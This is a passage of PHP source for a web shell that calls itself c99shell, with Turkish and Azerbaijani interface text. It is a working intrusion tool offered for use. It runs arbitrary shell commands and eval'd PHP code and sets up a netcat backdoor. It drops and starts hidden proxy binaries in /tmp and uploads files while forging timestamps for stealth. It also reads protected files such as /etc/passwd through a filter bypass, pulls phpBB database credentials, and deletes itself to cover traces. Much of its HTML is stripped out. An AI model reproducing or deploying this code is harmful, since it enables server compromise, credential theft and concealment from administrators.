    elseif (!fopen($mkfile,”w”)) {echo “Make File \””.htmlspecialchars($mkfile).”\”: access denied”;}
    else {$act = “f”; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
    }
    else {$act = $dspact = “ls”;}
    }
    if ($act == “encoder”)
    {
    echo “Encoder:

    Input:

    Hashes:

    “;
    foreach(array(“md5″,”crypt”,”sha1″,”crc32″) as $v)
    {
    echo $v.” –
    “;
    }
    echo ”
    Url:
    urlencode –

    urldecode –

    Base64:
    base64_encode – “;
    echo ”
    base64_decode – “;
    if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo ““;}
    else
    {
    $debase64 = base64_decode($encoder_input);
    $debase64 = str_replace(“\0″,”[0]”,$debase64);
    $a = explode(“\r\n”,$debase64);
    $rows = count($a);
    $debase64 = htmlspecialchars($debase64);
    if ($rows == 1) {echo ““;}
    else {$rows++; echo ““;}
    echo ” “;
    }
    echo ”

    Base convertations:

    dec2hex –

    “;
    }
    if ($act == “backc”)
    {
    $ip = $_SERVER[“REMOTE_ADDR”];
    $msg = $_POST[‘backcconnmsg’];
    $emsg = $_POST[‘backcconnmsge’];
    echo(“Arka Kapi Girisi:

    Sunucu: Port No: Use:

    Server ile baglanti kurmaniz icin Məlumatsayarinizda nc.exe ve acik bir port gerekir! Komutunuz; ‘nc -l -n -v -p 5992

    “);
    echo(“$msg”);
    echo(“$emsg”);
    }

    if ($act == “shbd”){
    $msg = $_POST[‘backcconnmsg’];
    $emsg = $_POST[‘backcconnmsge’];
    echo(“Arka kapi yarat:

    Baglanti portu:

    “);
    echo(“$msg”);
    echo(“$emsg”);
    }

    if ($act == “proxy”) {
    cf(“/tmp/hantu.tgz”,$proxy_shit);
    ex(“cd /tmp;tar -zxvf hantu.tgz”);
    ex(“cd /tmp;cd .setan;chmod 777 xh”);
    ex(“cd /tmp;cd .setan;chmod 777 httpd”);
    ex(“cd /tmp;cd .setan;./xh -s [kmod] ./httpd start”);
    checkproxyhost();
    $msg = $_POST[‘proxyhostmsg’];
    echo(“$msg”);
    unlink(“/tmp/hantu.tgz”);
    ex(“cd /tmp; rm -r .setan”);
    }

    if ($act == “selfremove”)
    {
    if (($submit == $rndcode) and ($submit != “”))
    {
    if (unlink(__FILE__)) {@ob_clean(); echo “Gone!”; c99shexit(); }
    else {echo “

    Can’t delete “.__FILE__.”!
    “;}
    }
    else
    {
    if (!empty($rndcode)) {echo “Error: incorrect confimation!“;}
    $rnd = rand(0,9).rand(0,9).rand(0,9);
    echo “

    “.__FILE__.” Adresindeki Shelli Sil!

    Silmek icin yandaki kodu girin \””.$rnd.”\” 

    “;
    }
    }
    if ($act == “search”){
    echo “Dosya Arama Sistemi:

    “;
    if (empty($search_in)) {$search_in = $d;}
    if (empty($search_name)) {$search_name = “(.*)”; $search_name_regexp = 1;}
    if (empty($search_text_wwo)) {$search_text_regexp = 0;}
    if (!empty($submit))
    {
    $found = array();
    $found_d = 0;
    $found_f = 0;
    $search_i_f = 0;
    $search_i_d = 0;
    $a = array
    (
    “name”=>$search_name, “name_regexp”=>$search_name_regexp,
    “text”=>$search_text, “text_regexp”=>$search_text_regxp,
    “text_wwo”=>$search_text_wwo,
    “text_cs”=>$search_text_cs,
    “text_not”=>$search_text_not
    );
    $searchtime = getmicrotime();
    $in = array_unique(explode(“;”,$search_in));
    foreach($in as $v) {c99fsearch($v);}
    $searchtime = round(getmicrotime()-$searchtime,4);
    if (count($found) == 0) {echo “Dosya Bulunamadi“;}
    else
    {
    $ls_arr = $found;
    $disp_fullpath = TRUE;
    $act = “ls”;
    }
    }
    echo “


    Dosya / Dizin Ismi:   – regexp

    Nerde Arayalim:  

    Aranacak Kelimemi:  

    – regexp
      whole words only
       – case sensitive
       – find files NOT containing the text

    “;
    if ($act == “ls”) {$dspact = $act; echo ”


    Search took “.$searchtime.” secs (“.$search_i_f.” files and “.$search_i_d.” folders, “.round(($search_i_f+$search_i_d)/$searchtime,4).” objects per second).

    “;}
    }
    if ($act == “chmod”)
    {
    $mode = fileperms($d.$f);
    if (!$mode) {echo “Change file-mode with error: can’t get current value.”;}
    else
    {
    $form = TRUE;
    if ($chmod_submit)
    {
    $octet = “0”.base_convert(($chmod_o[“r”]?1:0).($chmod_o[“w”]?1:0).($chmod_o[“x”]?1:0).($chmod_g[“r”]?1:0).($chmod_g[“w”]?1:0).($chmod_g[“x”]?1:0).($chmod_w[“r”]?1:0).($chmod_w[“w”]?1:0).($chmod_w[“x”]?1:0),2,8);
    if (chmod($d.$f,$octet)) {$act = “ls”; $form = FALSE; $err = “”;}
    else {$err = “Can’t chmod to “.$octet.”.”;}
    }
    if ($form)
    {
    $perms = parse_perms($mode);
    echo “Changing file-mode (“.$d.$f.”), “.view_perms_color($d.$f).” (“.substr(decoct(fileperms($d.$f)),-4,4).”)
    “.($err?”Error: “.$err:””).”

    Owner

     Read
     Write
    eXecute

    Group

     Read
     Write
    eXecute

    World

     Read
     Write
    eXecute

    “;
    }
    }
    }
    if ($act == “upload”)
    {
    $uploadmess = “”;
    $uploadpath = str_replace(“\\”,DIRECTORY_SEPARATOR,$uploadpath);
    if (empty($uploadpath)) {$uploadpath = $d;}
    elseif (substr($uploadpath,-1) != “/”) {$uploadpath .= “/”;}
    if (!empty($submit))
    {
    global $HTTP_POST_FILES;
    $uploadfile = $HTTP_POST_FILES[“uploadfile”];
    if (!empty($uploadfile[“tmp_name”]))
    {
    if (empty($uploadfilename)) {$destin = $uploadfile[“name”];}
    else {$destin = $userfilename;}
    if (!move_uploaded_file($uploadfile[“tmp_name”],$uploadpath.$destin)) {$uploadmess .= “Error uploading file “.$uploadfile[“name”].”. Can’t copy \””.$uploadfile[“tmp_name”].”\” to \””.$uploadpath.$destin.”\”.

    “;}
    }
    elseif (!empty($uploadurl))
    {
    if (!empty($uploadfilename)) {$destin = $uploadfilename;}
    else
    {
    $destin = explode(“/”,$destin);
    $destin = $destin[count($destin)-1];
    if (empty($destin))
    {
    $i = 0;
    $b = “”;
    while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = “_”.$i;} $destin = “index”.$b.”.html”; $i++;}}
    }
    if ((!eregi(“http://”,$uploadurl)) and (!eregi(“https://”,$uploadurl)) and (!eregi(“ftp://”,$uploadurl))) {echo “Incorect url!
    “;}
    else
    {
    $st = getmicrotime();
    $content = @file_get_contents($uploadurl);
    $dt = round(getmicrotime()-$st,4);
    if (!$content) {$uploadmess .= “Can’t download file!
    “;}
    else
    {
    if ($filestealth) {$stat = stat($uploadpath.$destin);}
    $fp = fopen($uploadpath.$destin,”w”);
    if (!$fp) {$uploadmess .= “Error writing to file “.htmlspecialchars($destin).”!
    “;}
    else
    {
    fwrite($fp,$content,strlen($content));
    fclose($fp);
    if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
    }
    }
    }
    }
    }
    if ($miniform)
    {
    echo ““.$uploadmess.”“;
    $act = “ls”;
    }
    else
    {
    echo “File upload:
    “.$uploadmess.”

    Select file on your local computer:
                   or
    Input URL:

    Save this file dir:

    File-name (auto-fill):

     convert file name to lovercase


    “;
    }
    }
    if ($act == “delete”)
    {
    $delerr = “”;
    foreach ($actbox as $v)
    {
    $result = FALSE;
    $result = fs_rmobj($v);
    if (!$result) {$delerr .= “Can’t delete “.htmlspecialchars($v).”
    “;}
    }
    if (!empty($delerr)) {echo “Deleting with errors:
    “.$delerr;}
    $act = “ls”;
    }
    if (!$usefsbuff)
    {
    if (($act == “paste”) or ($act == “copy”) or ($act == “cut”) or ($act == “unselect”)) {echo “

    Sorry, buffer is disabled. For enable, set directive \”\$useFSbuff\” as TRUE.
    “;}
    }
    else
    {
    if ($act == “copy”) {$err = “”; $sess_data[“copy”] = array_merge($sess_data[“copy”],$actbox); c99_sess_put($sess_data); $act = “ls”; }
    elseif ($act == “cut”) {$sess_data[“cut”] = array_merge($sess_data[“cut”],$actbox); c99_sess_put($sess_data); $act = “ls”;}
    elseif ($act == “unselect”) {foreach ($sess_data[“copy”] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data[“copy”][$k]);}} foreach ($sess_data[“cut”] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data[“cut”][$k]);}} c99_sess_put($sess_data); $act = “ls”;}
    if ($actemptybuff) {$sess_data[“copy”] = $sess_data[“cut”] = array(); c99_sess_put($sess_data);}
    elseif ($actpastebuff)
    {
    $psterr = “”;
    foreach($sess_data[“copy”] as $k=>$v)
    {
    $to = $d.basename($v);
    if (!fs_copy_obj($v,$to)) {$psterr .= “Can’t copy “.$v.” to “.$to.”!
    “;}
    if ($copy_unset) {unset($sess_data[“copy”][$k]);}
    }
    foreach($sess_data[“cut”] as $k=>$v)
    {
    $to = $d.basename($v);
    if (!fs_move_obj($v,$to)) {$psterr .= “Can’t move “.$v.” to “.$to.”!
    “;}
    unset($sess_data[“cut”][$k]);
    }
    c99_sess_put($sess_data);
    if (!empty($psterr)) {echo “Pasting with errors:
    “.$psterr;}
    $act = “ls”;
    }
    elseif ($actarcbuff)
    {
    $arcerr = “”;
    if (substr($actarcbuff_path,-7,7) == “.tar.gz”) {$ext = “.tar.gz”;}
    else {$ext = “.tar.gz”;}
    if ($ext == “.tar.gz”) {$cmdline = “tar cfzv”;}
    $cmdline .= ” “.$actarcbuff_path;
    $objects = array_merge($sess_data[“copy”],$sess_data[“cut”]);
    foreach($objects as $v)
    {
    $v = str_replace(“\\”,DIRECTORY_SEPARATOR,$v);
    if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
    if (is_dir($v))
    {
    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
    $v .= “*”;
    }
    $cmdline .= ” “.$v;
    }
    $tmp = realpath(“.”);
    chdir($d);
    $ret = myshellexec($cmdline);
    chdir($tmp);
    if (empty($ret)) {$arcerr .= “Can’t call archivator (“.htmlspecialchars(str2mini($cmdline,60)).”)!
    “;}
    $ret = str_replace(“\r\n”,”\n”,$ret);
    $ret = explode(“\n”,$ret);
    if ($copy_unset) {foreach($sess_data[“copy”] as $k=>$v) {unset($sess_data[“copy”][$k]);}}
    foreach($sess_data[“cut”] as $k=>$v)
    {
    if (in_array($v,$ret)) {fs_rmobj($v);}
    unset($sess_data[“cut”][$k]);
    }
    c99_sess_put($sess_data);
    if (!empty($arcerr)) {echo “Archivation errors:
    “.$arcerr;}
    $act = “ls”;
    }
    elseif ($actpastebuff)
    {
    $psterr = “”;
    foreach($sess_data[“copy”] as $k=>$v)
    {
    $to = $d.basename($v);
    if (!fs_copy_obj($v,$d)) {$psterr .= “Can’t copy “.$v.” to “.$to.”!
    “;}
    if ($copy_unset) {unset($sess_data[“copy”][$k]);}
    }
    foreach($sess_data[“cut”] as $k=>$v)
    {
    $to = $d.basename($v);
    if (!fs_move_obj($v,$d)) {$psterr .= “Can’t move “.$v.” to “.$to.”!
    “;}
    unset($sess_data[“cut”][$k]);
    }
    c99_sess_put($sess_data);
    if (!empty($psterr)) {echo “Pasting with errors:
    “.$psterr;}
    $act = “ls”;
    }
    }
    if ($act == “cmd”)
    {
    if (trim($cmd) == “ps aux”) {$act = “processes”;}
    elseif (trim($cmd) == “tasklist”) {$act = “processes”;}
    else
    {
    @chdir($chdir);
    if (!empty($submit))
    {
    $execcmd = $_REQUEST[‘cmd’];
    echo “Result Of Locally Executed Command: $execcmd
    “;
    $olddir = realpath(“.”);
    @chdir($d);
    $ret = myshellexec($cmd);
    $ret = convert_cyr_string($ret,”d”,”w”);
    if ($cmd_txt)
    {
    $rows = count(explode(“\r\n”,$ret))+1;
    if ($rows < 10) {$rows = 10;}
    echo ”
    “;
    }
    else {echo $ret.”
    “;}
    @chdir($olddir);
    }
    else {echo “Execution command“; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
    echo “

     Display in text-area 

    “;
    }
    }
    if ($act == “ls”)
    {
    if (count($ls_arr) > 0) {$list = $ls_arr;}
    else
    {
    $list = array();
    if ($h = @opendir($d))
    {
    while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
    closedir($h);
    }
    else {}
    }
    if (count($list) == 0) {echo “

    Can’t open folder “.htmlspecialchars($d).”
    “;}
    else
    {
    //Building array
    $objects = array();
    $vd = “f”; //Viewing mode
    if ($vd == “f”)
    {
    $objects[“head”] = array();
    $objects[“folders”] = array();
    $objects[“links”] = array();
    $objects[“files”] = array();
    foreach ($list as $v)
    {
    $o = basename($v);
    $row = array();
    if ($o == “.”) {$row[] = $d.$o; $row[] = “LINK”;}
    elseif ($o == “..”) {$row[] = $d.$o; $row[] = “LINK”;}
    elseif (is_dir($v))
    {
    if (is_link($v)) {$type = “LINK”;}
    else {$type = “DIR”;}
    $row[] = $v;
    $row[] = $type;
    }
    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
    $row[] = filemtime($v);
    if (!$win)
    {
    $ow = posix_getpwuid(fileowner($v));
    $gr = posix_getgrgid(filegroup($v));
    $row[] = ($ow[“name”]?$ow[“name”]:fileowner($v)).”/”.($gr[“name”]?$gr[“name”]:filegroup($v));
    }
    $row[] = fileperms($v);
    if (($o == “.”) or ($o == “..”)) {$objects[“head”][] = $row;}
    elseif (is_link($v)) {$objects[“links”][] = $row;}
    elseif (is_dir($v)) {$objects[“folders”][] = $row;}
    elseif (is_file($v)) {$objects[“files”][] = $row;}
    $i++;
    }
    $row = array();
    $row[] = “Adı“;
    $row[] = “hecmi“;
    $row[] = “Dəyişdirme Tarihi“;
    if (!$win)
    {$row[] = “Grup“;}
    $row[] = “icazələr“;
    $row[] = “Aktif“;
    $parsesort = parsesort($sort);
    $sort = $parsesort[0].$parsesort[1];
    $k = $parsesort[0];
    if ($parsesort[1] != “a”) {$parsesort[1] = “d”;}
    $y = ““;
    $y .= “[Sort-“.($parsesort[1] == “a”?”Asc.”:”Desc”).”]
    “;
    $row[$k] .= $y;
    for($i=0;$i“.$row[$i].””;}
    }
    $v = $parsesort[0];
    usort($objects[“folders”], “tabsort”);
    usort($objects[“links”], “tabsort”);
    usort($objects[“files”], “tabsort”);
    if ($parsesort[1] == “d”)
    {
    $objects[“folders”] = array_reverse($objects[“folders”]);
    $objects[“files”] = array_reverse($objects[“files”]);
    }
    $objects = array_merge($objects[“head”],$objects[“folders”],$objects[“links”],$objects[“files”]);
    $tab = array();
    $tab[“cols”] = array($row);
    $tab[“head”] = array();
    $tab[“folders”] = array();
    $tab[“links”] = array();
    $tab[“files”] = array();
    $i = 0;
    foreach ($objects as $a)
    {
    $v = $a[0];
    $o = basename($v);
    $dir = dirname($v);
    if ($disp_fullpath) {$disppath = $v;}
    else {$disppath = $o;}
    $disppath = str2mini($disppath,60);
    if (in_array($v,$sess_data[“cut”])) {$disppath = ““.$disppath.”“;}
    elseif (in_array($v,$sess_data[“copy”])) {$disppath = ““.$disppath.”“;}
    foreach ($regxp_highlight as $r)
    {
    if (ereg($r[0],$o))
    {
    if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo “Warning! Configuration error in \$regxp_highlight[“.$k.”][0] – unknown command.”; c99shexit();}
    else
    {
    $r[1] = round($r[1]);
    $isdir = is_dir($v);
    if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
    {
    if (empty($r[2])) {$r[2] = ““; $r[3] = ““;}
    $disppath = $r[2].$disppath.$r[3];
    if ($r[4]) {break;}
    }
    }
    }
    }
    $uo = urlencode($o);
    $ud = urlencode($dir);
    $uv = urlencode($v);
    $row = array();
    if ($o == “.”)
    {
    $row[] = ” “.$o.”“;
    $row[] = “LINK”;
    }
    elseif ($o == “..”)
    {
    $row[] = ” “.$o.”“;
    $row[] = “LINK”;
    }
    elseif (is_dir($v))
    {
    if (is_link($v))
    {
    $disppath .= ” => “.readlink($v);
    $type = “LINK”;
    $row[] = ” [“.$disppath.”]“;
    }
    else
    {
    $type = “DIR”;
    $row[] = ” [“.$disppath.”]“;
    }
    $row[] = $type;
    }
    elseif(is_file($v))
    {
    $ext = explode(“.”,$o);
    $c = count($ext)-1;
    $ext = $ext[$c];
    $ext = strtolower($ext);
    $row[] = ” “.$disppath.”“;
    $row[] = view_size($a[1]);
    }
    $row[] = date(“d.m.Y H:i:s”,$a[2]);
    if (!$win) {$row[] = $a[3];}
    $row[] = ““.view_perms_color($v).”“;
    if ($o == “.”) {$checkbox = ““; $i–;}
    else {$checkbox = ““;}
    if (is_dir($v)) {$row[] = “[Info] “.$checkbox;}
    else {$row[] = “[Məlumat] [Dəyişdir] [Yüklə] “.$checkbox;}
    if (($o == “.”) or ($o == “..”)) {$tab[“head”][] = $row;}
    elseif (is_link($v)) {$tab[“links”][] = $row;}
    elseif (is_dir($v)) {$tab[“folders”][] = $row;}
    elseif (is_file($v)) {$tab[“files”][] = $row;}
    $i++;
    }
    }
    // Compiling table
    $table = array_merge($tab[“cols”],$tab[“head”],$tab[“folders”],$tab[“links”],$tab[“files”]);
    echo “”;
    foreach($table as $row)
    {
    echo “\r\n”;
    foreach($row as $v) {echo “\r\n”;}
    echo “\r\n”;
    }
    echo ”

    “.$v.”


      
    ";
    if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
    {
    echo "                   ";
    }
    echo " 

    ";
    echo "";
    }
    }

    if ($act == "processes")
    {
    echo "Islemci Məlumatleri:
    ";
    if (!$win) {$handler = "ps aux".($grep?" | grep '".addslashes($grep)."'":"");}
    else {$handler = "tasklist";}
    $ret = myshellexec($handler);
    if (!$ret) {echo "
    Can't execute \"".$handler."\"!";}
    else
    {
    if (empty($processes_sort)) {$processes_sort = $sort_default;}
    $parsesort = parsesort($processes_sort);
    if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
    $k = $parsesort[0];
    if ($parsesort[1] != "a") {$y = "[sort_desc]";}
    else {$y = "[sort_asc]";}
    $ret = htmlspecialchars($ret);
    if (!$win)
    {
    if ($pid)
    {
    if (is_null($sig)) {$sig = 9;}
    echo "Sending signal ".$sig." to #".$pid."... ";
    if (posix_kill($pid,$sig)) {echo "OK.";}
    else {echo "ERROR.";}
    }
    while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);}
    $stack = explode("\n",$ret);
    $head = explode(" ",$stack[0]);
    unset($stack[0]);
    for($i=0;$i".$head[$i]."";}
    }
    $prcs = array();
    foreach ($stack as $line)
    {
    if (!empty($line))
    {
    echo "

    ";
    foreach($tab as $i=>$k)
    {
    echo "";
    foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "";}
    echo "";
    }
    echo "

    ".$v."

    ";
    }
    }
    if ($act == "eval")
    {
    if (!empty($eval))
    {
    echo "php Kod Calistir:
    ";
    $tmp = ob_get_contents();
    $olddir = realpath(".");
    @chdir($d);
    if ($tmp)
    {
    ob_clean();
    eval($eval);
    $ret = ob_get_contents();
    $ret = convert_cyr_string($ret,"d","w");
    ob_clean();
    echo $tmp;
    if ($eval_txt)
    {
    $rows = count(explode("\r\n",$ret))+1;
    if ($rows < 10) {$rows = 10;}
    echo "
    ";
    }
    else {echo $ret."
    ";}
    }
    else
    {
    if ($eval_txt)
    {
    echo "
    ";
    }
    else {echo $ret;}
    }
    @chdir($olddir);
    }
    else {echo "Execution PHP-code"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
    echo "

     Display in text-area 

    ";
    }
    if ($act == "f")
    {
    if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
    {
    if (file_exists($d.$f)) {echo "

    Permision denied (".htmlspecialchars($d.$f).")!
    ";}
    else {echo "
    File does not exists (".htmlspecialchars($d.$f).")!
    Create
    ";}
    }
    else
    {
    $r = @file_get_contents($d.$f);
    $ext = explode(".",$f);
    $c = count($ext)-1;
    $ext = $ext[$c];
    $ext = strtolower($ext);
    $rft = "";
    foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
    if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
    if (empty($ft)) {$ft = $rft;}
    $arr = array(
    array("[hex]","info"),
    array("[html]","html"),
    array("[txt]","txt"),
    array("[Code]","code"),
    array("[Session]","phpsess"),
    array("[exe]","exe"),
    array("[SDB]","sdb"),
    array("[gif]","img"),
    array("[ini]","ini"),
    array("[download]","download"),
    array("[rtf]","notepad"),
    array("[change]","edit")
    );
    echo "Viewing file:    [$ext] ".$f." (".view_size(filesize($d.$f)).")      ".view_perms_color($d.$f)."
    Select action/file-type:
    ";
    foreach($arr as $t)
    {
    if ($t[1] == $rft) {echo " ".$t[0]."";}
    elseif ($t[1] == $ft) {echo " ".$t[0]."";}
    else {echo " ".$t[0]."";}
    echo " (+) |";
    }
    echo "


    ";
    if ($ft == "info")
    {
    echo "Information:";
    if (!$win)
    {
    echo "

    Path ".$d.$f."
    Size ".view_size(filesize($d.$f))."
    MD5 ".md5_file($d.$f)."
    Owner/Group ";
    $ow = posix_getpwuid(fileowner($d.$f));
    $gr = posix_getgrgid(filegroup($d.$f));
    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
    }
    echo "
    Perms ".view_perms_color($d.$f)."
    Create time ".date("d/m/Y H:i:s",filectime($d.$f))."
    Access time ".date("d/m/Y H:i:s",fileatime($d.$f))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d.$f))."

    ";
    $fi = fopen($d.$f,"rb");
    if ($fi)
    {
    if ($fullhexdump) {echo "FULL HEXDUMP"; $str = fread($fi,filesize($d.$f));}
    else {echo "HEXDUMP PREVIEW"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
    $n = 0;
    $a0 = "00000000
    ";
    $a1 = "";
    $a2 = "";
    for ($i=0; $i";}
    $a1 .= "
    ";
    $a2 .= "
    ";
    }
    }
    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."
    ";}
    echo "

    ".$a0." ".$a1." ".$a2."

    ";
    }
    $encoded = "";
    if ($base64 == 1)
    {
    echo "Base64 Encode
    ";
    $encoded = base64_encode(file_get_contents($d.$f));
    }
    elseif($base64 == 2)
    {
    echo "Base64 Encode + Chunk
    ";
    $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
    }
    elseif($base64 == 3)
    {
    echo "Base64 Encode + Chunk + Quotes
    ";
    $encoded = base64_encode(file_get_contents($d.$f));
    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
    }
    elseif($base64 == 4)
    {
    $text = file_get_contents($d.$f);
    $encoded = base64_decode($text);
    echo "Base64 Decode";
    if (base64_encode($encoded) != $text) {echo " (failed)";}
    echo "

    ";
    }
    if (!empty($encoded))
    {
    echo "

    ";
    }
    echo "HEXDUMP: [Full] [Preview]
    Base64:
    [Encode
    [+chunk
    [+chunk+quotes
    [Decode";
    }
    elseif ($ft == "html")
    {
    if ($white) {@ob_clean();}
    echo $r;
    if ($white) {c99shexit();}
    }
    elseif ($ft == "txt") {echo "

    ".htmlspecialchars($r)."

    ";}
    elseif ($ft == "ini") {echo "

    "; var_dump(parse_ini_file($d.$f,TRUE)); echo "

    ";}
    elseif ($ft == "phpsess")
    {
    echo "

    ";
       $v = explode("|",$r);
       echo $v[0]."
    ";
       var_dump(unserialize($v[1]));
       echo "

    ";
    }
    elseif ($ft == "exe")
    {
    $ext = explode(".",$f);
    $c = count($ext)-1;
    $ext = $ext[$c];
    $ext = strtolower($ext);
    $rft = ";";
    foreach($exeftypes as $k=>$v)
    {
    if (in_array($ext,$v)) {$rft = $k; break;}
    }
    $cmd = str_replace("%f%",$f,$rft);
    echo "Execute file:


    Display in text-area

    ";
    }
    elseif ($ft == "sdb") {echo "

    "; var_dump(unserialize(base64_decode($r))); echo "

    ";}
    elseif ($ft == "code")
    {
    if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
    {
    $arr = explode("\n",$r);
    if (count($arr == 18))
    {
    include($d.$f);
    echo "phpBB configuration is detected in this file!
    ";
    if ($dbms == "mysql4") {$dbms = "mysql";}
    if ($dbms == "mysql") {echo "Connect to DB

    ";}
    else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";}
    echo "Parameters for manual connect:
    ";
    $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
    foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'
    ";}
    echo "


    ";
    }
    }
    echo "

    ";
    if (!empty($white)) {@ob_clean();}
    highlight_file($d.$f);
    if (!empty($white)) {c99shexit();}
    echo "

    ";
    }
    elseif ($ft == "download")
    {
    @ob_clean();
    header("Content-type: application/octet-stream");
    header("Content-length: ".filesize($d.$f));
    header("Content-disposition: attachment; filename=\"".$f."\";");
    echo $r;
    exit;
    }
    elseif ($ft == "notepad")
    {
    @ob_clean();
    header("Content-type: text/plain");
    header("Content-disposition: attachment; filename=\"".$f.".txt\";");
    echo($r);
    exit;
    }
    elseif ($ft == "img")
    {
    $inf = getimagesize($d.$f);
    if (!$white)
    {
    if (empty($imgsize)) {$imgsize = 20;}
    $width = $inf[0]/100*$imgsize;
    $height = $inf[1]/100*$imgsize;
    echo "

    Size: ";
    $sizes = array("100","50","20");
    foreach ($sizes as $v)
    {
    echo "";
    if ($imgsize != $v ) {echo $v;}
    else {echo "".$v."";}
    echo "
       ";
    }
    echo "

    ";
    }
    else
    {
    @ob_clean();
    $ext = explode($f,".");
    $ext = $ext[count($ext)-1];
    header("Content-type: ".$inf["mime"]);
    readfile($d.$f);
    exit;
    }
    }
    elseif ($ft == "edit")
    {
    if (!empty($submit))
    {
    if ($filestealth) {$stat = stat($d.$f);}
    $fp = fopen($d.$f,"w");
    if (!$fp) {echo "Can't write to file!";}
    else
    {
    echo "Saved!";
    fwrite($fp,$edit_text);
    fclose($fp);
    if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
    $r = $edit_text;
    }
    }
    $rows = count(explode("\r\n",$r));
    if ($rows < 10) {$rows = 10;}
    if ($rows > 30) {$rows = 30;}
    echo "

      

    ";
    }
    elseif (!empty($ft)) {echo "

    Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.
    ";}
    else {echo "
    Unknown extension (".$ext."), please, select type manually.
    ";}
    }
    }
    }
    else
    {
    @ob_clean();

    $imgequals = array(
    "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
    "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
    "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
    "ext_html"=>array("ext_html","ext_htm"),
    "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
    "ext_lnk"=>array("ext_lnk","ext_url"),
    "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
    "ext_doc"=>array("ext_doc","ext_dot"),
    "ext_js"=>array("ext_js","ext_vbs"),
    "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
    "ext_wri"=>array("ext_wri","ext_rtf"),
    "ext_swf"=>array("ext_swf","ext_fla"),
    "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
    "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
    );
    if (!$getall)
    {
    header("Content-type: image/gif");
    header("Cache-control: public");
    header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
    header("Cache-control: max-age=".(60*60*24*7));
    header("Last-Modified: ".date("r",filemtime(__FILE__)));
    foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
    if (empty($images[$img])) {$img = "small_unk";}
    if (in_array($img,$ext_tar)) {$img = "ext_tar";}
    echo base64_decode($images[$img]);
    }
    else
    {
    foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]
    ");}}}}
    natsort($images);
    $k = array_keys($images);
    echo "

    ";
    foreach ($k as $u) {echo $u.":
    ";}
    echo "
    ";
    }
    exit;
    }
    ?>




    Əmr İşlət:
     


    Versiya Melumatlarini Axtar


      


    Qorunmanı Keç,
    Fayl Oxu [ByPass Method 2]

    Əmr Sətiri:

    Məsələn: /etc/passwd/
    Trying To Get File $get
    ";
    if(copy("compress.zlib://".$file, $temp)){
    $fichier = fopen($temp, "r");
    $action = fread($fichier, filesize($temp));
    fclose($fichier);
    $source=htmlspecialchars($action);

    echo "

    Reading $get:


    ";
    unlink($temp);
    } else {
    echo("

    Sorry... File
    ".htmlspecialchars($file)." dosen't exists or you don't have
    access.
    ");
    }
    echo "

    ";
    }

    if(isset($_REQUEST['file']))
    {
    rsg_read();
    }

    ?>

    Trying To List Folder $chemin
    ";
    foreach ($files as $filename) {
    echo "

    ";
       echo "$filename\n";
       echo "

    ";
    }
    }

    if(isset($_REQUEST['directory']))
    {
    rsg_glob();
    }

    ?>



    Qorunmani Keç, Qovluq Oxu [ByPass Method 1]:
     

     


    Əmr Sətiri:

    Məsələn: /etc/



    Axtarış

      



    Upload

     


    Qovluq Yarat

     


    Fayl Yarat

     



    Qovluqa Get

     



    Fayla Get

     


  • Həcm
  • : ".view_size($total)."
